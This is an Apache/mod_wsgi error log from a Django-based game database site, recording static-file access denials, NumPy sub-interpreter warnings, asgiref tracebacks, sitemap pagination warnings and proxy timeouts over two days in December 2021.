[Sun Dec 05 00:31:04.033900 2021] [authz_core:error] [pid 153908:tid 139843539535616] [client 116.102.218.37:55905] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:04.044800 2021] [authz_core:error] [pid 153935:tid 139843573106432] [client 116.102.218.37:55903] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:04.057964 2021] [authz_core:error] [pid 153908:tid 139843531142912] [client 116.102.218.37:55902] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:04.071323 2021] [authz_core:error] [pid 153908:tid 139843556321024] [client 116.102.218.37:55905] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:31.348312 2021] [wsgi:error] [pid 171626:tid 139843683251968] [remote 185.191.171.38:46090] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Sun Dec 05 00:31:31.353153 2021] [wsgi:error] [pid 171626:tid 139843683251968] [remote 185.191.171.38:46090] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Sun Dec 05 00:31:31.353169 2021] [wsgi:error] [pid 171626:tid 139843683251968] [remote 185.191.171.38:46090]   __import__(dependency)
[Sun Dec 05 00:31:55.575024 2021] [authz_core:error] [pid 171840:tid 139843464001280] [client 116.102.218.37:55909] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/11234
[Sun Dec 05 00:33:18.329886 2021] [authz_core:error] [pid 171840:tid 139843514357504] [client 116.102.218.37:55914] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1441
[Sun Dec 05 00:33:37.394053 2021] [authz_core:error] [pid 171839:tid 139843683251968] [client 116.102.218.37:55915] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.399756 2021] [authz_core:error] [pid 171840:tid 139843430430464] [client 116.102.218.37:55917] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.674796 2021] [authz_core:error] [pid 171840:tid 139843691644672] [client 116.102.218.37:55917] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.676067 2021] [authz_core:error] [pid 171839:tid 139843598284544] [client 116.102.218.37:55915] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.706522 2021] [authz_core:error] [pid 171840:tid 139843480786688] [client 116.102.218.37:55917] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.719839 2021] [authz_core:error] [pid 171839:tid 139843489179392] [client 116.102.218.37:55915] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.740820 2021] [authz_core:error] [pid 171840:tid 139843556321024] [client 116.102.218.37:55917] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.752606 2021] [authz_core:error] [pid 171839:tid 139843472393984] [client 116.102.218.37:55915] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.758110 2021] [authz_core:error] [pid 171839:tid 139843674859264] [client 116.102.218.37:55918] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.776751 2021] [authz_core:error] [pid 171840:tid 139843447215872] [client 116.102.218.37:55917] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.788156 2021] [authz_core:error] [pid 171839:tid 139843514357504] [client 116.102.218.37:55915] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.793927 2021] [authz_core:error] [pid 171839:tid 139843430430464] [client 116.102.218.37:55918] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.815926 2021] [authz_core:error] [pid 171840:tid 139843564713728] [client 116.102.218.37:55917] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.823101 2021] [authz_core:error] [pid 171839:tid 139843564713728] [client 116.102.218.37:55915] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.830778 2021] [authz_core:error] [pid 171839:tid 139843556321024] [client 116.102.218.37:55918] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.861044 2021] [authz_core:error] [pid 171840:tid 139843472393984] [client 116.102.218.37:55917] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.862871 2021] [authz_core:error] [pid 171839:tid 139843547928320] [client 116.102.218.37:55915] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.865626 2021] [authz_core:error] [pid 171839:tid 139843464001280] [client 116.102.218.37:55918] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.899017 2021] [authz_core:error] [pid 171840:tid 139843464001280] [client 116.102.218.37:55917] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.902803 2021] [authz_core:error] [pid 171839:tid 139843589891840] [client 116.102.218.37:55918] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.904033 2021] [authz_core:error] [pid 171839:tid 139843505964800] [client 116.102.218.37:55915] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.936772 2021] [authz_core:error] [pid 171839:tid 139843531142912] [client 116.102.218.37:55918] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.939086 2021] [authz_core:error] [pid 171839:tid 139843522750208] [client 116.102.218.37:55915] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.941589 2021] [authz_core:error] [pid 171840:tid 139843455608576] [client 116.102.218.37:55917] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:37.975648 2021] [authz_core:error] [pid 171839:tid 139843497572096] [client 116.102.218.37:55915] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:33:39.443163 2021] [authz_core:error] [pid 171839:tid 139843438823168] [client 116.102.218.37:55915] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1741
[Sun Dec 05 00:33:59.111336 2021] [authz_core:error] [pid 171840:tid 139843598284544] [client 116.102.218.37:55922] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1101
[Sun Dec 05 00:34:32.174858 2021] [authz_core:error] [pid 171840:tid 139843547928320] [client 116.102.218.37:55925] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/3420
[Sun Dec 05 00:35:17.487502 2021] [authz_core:error] [pid 171840:tid 139843472393984] [client 116.102.218.37:55928] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/2085
[Sun Dec 05 00:35:37.361674 2021] [authz_core:error] [pid 171839:tid 139843438823168] [client 116.102.218.37:55927] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1987
[Sun Dec 05 00:36:00.721730 2021] [authz_core:error] [pid 171840:tid 139843505964800] [client 116.102.218.37:55933] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1281
[Sun Dec 05 00:36:20.695145 2021] [authz_core:error] [pid 171840:tid 139843539535616] [client 116.102.218.37:55934] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/2541
[Sun Dec 05 00:40:51.569143 2021] [authz_core:error] [pid 171840:tid 139843581499136] [client 125.164.230.14:51172] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:40:51.594105 2021] [authz_core:error] [pid 171840:tid 139843598284544] [client 125.164.230.14:51172] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:40:51.619081 2021] [authz_core:error] [pid 171840:tid 139843422037760] [client 125.164.230.14:51172] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:40:51.629035 2021] [authz_core:error] [pid 171840:tid 139843547928320] [client 125.164.230.14:51173] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:40:51.631525 2021] [authz_core:error] [pid 171839:tid 139843598284544] [client 125.164.230.14:51174] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:40:51.632953 2021] [authz_core:error] [pid 171840:tid 139843514357504] [client 125.164.230.14:51176] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:40:51.635063 2021] [authz_core:error] [pid 171840:tid 139843430430464] [client 125.164.230.14:51177] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:40:51.871834 2021] [authz_core:error] [pid 171839:tid 139843505964800] [client 125.164.230.14:51175] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:41:36.700617 2021] [authz_core:error] [pid 171839:tid 139843589891840] [client 125.164.230.14:51184] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:41:36.725580 2021] [authz_core:error] [pid 171839:tid 139843438823168] [client 125.164.230.14:51184] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:41:36.761565 2021] [authz_core:error] [pid 171839:tid 139843422037760] [client 125.164.230.14:51184] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:41:36.762536 2021] [authz_core:error] [pid 171840:tid 139843489179392] [client 125.164.230.14:51185] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:41:36.763358 2021] [authz_core:error] [pid 171840:tid 139843505964800] [client 125.164.230.14:51186] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:41:36.789431 2021] [authz_core:error] [pid 171840:tid 139843531142912] [client 125.164.230.14:51187] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:41:36.796723 2021] [authz_core:error] [pid 171840:tid 139843438823168] [client 125.164.230.14:51189] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:41:36.798529 2021] [authz_core:error] [pid 171839:tid 139843480786688] [client 125.164.230.14:51188] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:41:36.821502 2021] [authz_core:error] [pid 171839:tid 139843531142912] [client 125.164.230.14:51184] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:41:36.852614 2021] [authz_core:error] [pid 171839:tid 139843581499136] [client 125.164.230.14:51184] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 00:41:36.883562 2021] [authz_core:error] [pid 171839:tid 139843455608576] [client 125.164.230.14:51184] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/
Exception ignored in: <function Local.__del__ at 0x7f2fdd3e2c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Sun Dec 05 00:42:57.490802 2021] [wsgi:error] [pid 172274:tid 139843683251968] [remote 125.164.230.14:51202] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Sun Dec 05 00:42:57.490851 2021] [wsgi:error] [pid 172274:tid 139843683251968] [remote 125.164.230.14:51202] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Sun Dec 05 00:42:57.490855 2021] [wsgi:error] [pid 172274:tid 139843683251968] [remote 125.164.230.14:51202]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f2fdd3e2c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Sun Dec 05 00:44:32.484257 2021] [wsgi:error] [pid 172613:tid 139843683251968] [remote 51.222.253.9:57168] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Sun Dec 05 00:44:32.484299 2021] [wsgi:error] [pid 172613:tid 139843683251968] [remote 51.222.253.9:57168] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Sun Dec 05 00:44:32.484303 2021] [wsgi:error] [pid 172613:tid 139843683251968] [remote 51.222.253.9:57168]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f2fdd3e2c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Sun Dec 05 03:07:43.577474 2021] [wsgi:error] [pid 175226:tid 139843683251968] [remote 185.191.171.34:6442] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Sun Dec 05 03:07:43.577522 2021] [wsgi:error] [pid 175226:tid 139843683251968] [remote 185.191.171.34:6442] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Sun Dec 05 03:07:43.577528 2021] [wsgi:error] [pid 175226:tid 139843683251968] [remote 185.191.171.34:6442]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f2fdd3e2c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Sun Dec 05 03:10:12.692479 2021] [wsgi:error] [pid 175549:tid 139843683251968] [remote 153.165.119.5:60572] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Sun Dec 05 03:10:12.692525 2021] [wsgi:error] [pid 175549:tid 139843683251968] [remote 153.165.119.5:60572] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Sun Dec 05 03:10:12.692529 2021] [wsgi:error] [pid 175549:tid 139843683251968] [remote 153.165.119.5:60572]   __import__(dependency)
[Sun Dec 05 13:32:34.826946 2021] [wsgi:error] [pid 175549:tid 139843683251968] [remote 66.249.79.74:42081] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Attributes.models.Attributes'> QuerySet.
[Sun Dec 05 13:32:34.827360 2021] [wsgi:error] [pid 175549:tid 139843683251968] [remote 66.249.79.74:42081]   return paginator.Paginator(self._items(), self.limit)
[Sun Dec 05 13:32:35.072946 2021] [wsgi:error] [pid 175549:tid 139843683251968] [remote 66.249.79.74:42081] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Buffs.models.Buffs'> QuerySet.
[Sun Dec 05 13:32:35.072989 2021] [wsgi:error] [pid 175549:tid 139843683251968] [remote 66.249.79.74:42081]   return paginator.Paginator(self._items(), self.limit)
[Sun Dec 05 13:32:35.521753 2021] [wsgi:error] [pid 175549:tid 139843683251968] [remote 66.249.79.74:42081] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Items.models.Items'> QuerySet.
[Sun Dec 05 13:32:35.521795 2021] [wsgi:error] [pid 175549:tid 139843683251968] [remote 66.249.79.74:42081]   return paginator.Paginator(self._items(), self.limit)
[Sun Dec 05 13:32:38.873659 2021] [wsgi:error] [pid 175549:tid 139843683251968] [remote 66.249.79.74:42081] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Jobs.models.Jobs'> QuerySet.
[Sun Dec 05 13:32:38.873706 2021] [wsgi:error] [pid 175549:tid 139843683251968] [remote 66.249.79.74:42081]   return paginator.Paginator(self._items(), self.limit)
[Sun Dec 05 13:32:38.913148 2021] [wsgi:error] [pid 175549:tid 139843683251968] [remote 66.249.79.74:42081] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Maps.models.Maps'> QuerySet.
[Sun Dec 05 13:32:38.913193 2021] [wsgi:error] [pid 175549:tid 139843683251968] [remote 66.249.79.74:42081]   return paginator.Paginator(self._items(), self.limit)
[Sun Dec 05 13:32:38.993962 2021] [wsgi:error] [pid 175549:tid 139843683251968] [remote 66.249.79.74:42081] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Skills.models.Skills'> QuerySet.
[Sun Dec 05 13:32:38.994005 2021] [wsgi:error] [pid 175549:tid 139843683251968] [remote 66.249.79.74:42081]   return paginator.Paginator(self._items(), self.limit)
Exception ignored in: <function Local.__del__ at 0x7f2fdd3e2c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Sun Dec 05 15:14:28.935361 2021] [wsgi:error] [pid 185962:tid 139843683251968] [remote 185.191.171.8:11812] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Sun Dec 05 15:14:28.935726 2021] [wsgi:error] [pid 185962:tid 139843683251968] [remote 185.191.171.8:11812] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Sun Dec 05 15:14:28.935750 2021] [wsgi:error] [pid 185962:tid 139843683251968] [remote 185.191.171.8:11812]   __import__(dependency)
[Sun Dec 05 15:29:32.673770 2021] [wsgi:error] [pid 186552:tid 139843683251968] [remote 185.191.171.41:12450] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Sun Dec 05 15:29:32.674465 2021] [wsgi:error] [pid 186552:tid 139843683251968] [remote 185.191.171.41:12450] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Sun Dec 05 15:29:32.674481 2021] [wsgi:error] [pid 186552:tid 139843683251968] [remote 185.191.171.41:12450]   __import__(dependency)
[Sun Dec 05 15:31:12.045955 2021] [wsgi:error] [pid 186175:tid 139843589891840] (70007)The timeout specified has expired: [client 211.135.102.204:50117] mod_wsgi (pid=186175): Failed to proxy response to client., referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 15:31:13.231916 2021] [wsgi:error] [pid 186175:tid 139843438823168] (70007)The timeout specified has expired: [client 211.135.102.204:50116] mod_wsgi (pid=186175): Failed to proxy response to client., referer: https://jtos.tavernofsoul.com/
[Sun Dec 05 15:31:14.286130 2021] [wsgi:error] [pid 186175:tid 139843539535616] (70007)The timeout specified has expired: [client 211.135.102.204:50118] mod_wsgi (pid=186175): Failed to proxy response to client., referer: https://jtos.tavernofsoul.com/
[Mon Dec 06 00:00:06.168425 2021] [wsgi:error] [pid 186765:tid 139843447215872] [client 206.189.33.118:54394] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Mon Dec 06 00:00:11.147055 2021] [wsgi:error] [pid 191905:tid 139843683251968] [remote 54.36.148.25:36949] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Dec 06 00:00:11.147100 2021] [wsgi:error] [pid 191905:tid 139843683251968] [remote 54.36.148.25:36949] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Dec 06 00:00:11.147104 2021] [wsgi:error] [pid 191905:tid 139843683251968] [remote 54.36.148.25:36949]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f2fdd3e3c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Mon Dec 06 00:54:07.006568 2021] [wsgi:error] [pid 833:tid 140024499332864] [remote 207.46.13.211:41024] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Dec 06 00:54:07.007347 2021] [wsgi:error] [pid 833:tid 140024499332864] [remote 207.46.13.211:41024] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Dec 06 00:54:07.007395 2021] [wsgi:error] [pid 833:tid 140024499332864] [remote 207.46.13.211:41024]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
Exception ignored in: <function Local.__del__ at 0x7f59f738ac10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Mon Dec 06 02:17:52.684538 2021] [wsgi:error] [pid 4292:tid 140024507725568] [remote 113.149.162.97:54953] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Mon Dec 06 02:17:52.684595 2021] [wsgi:error] [pid 4292:tid 140024507725568] [remote 113.149.162.97:54953] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Mon Dec 06 02:17:52.684600 2021] [wsgi:error] [pid 4292:tid 140024507725568] [remote 113.149.162.97:54953]   __import__(dependency)
[Mon Dec 06 04:50:04.497591 2021] [wsgi:error] [pid 4301:tid 140024280459008] (2)No such file or directory: [client 118.241.180.75:50565] mod_wsgi (pid=4301): Unable to connect to WSGI daemon process 'django_jtos' on '/var/run/apache2/wsgi.826.1.4.sock' as user with uid=33., referer: https://jtos.tavernofsoul.com/
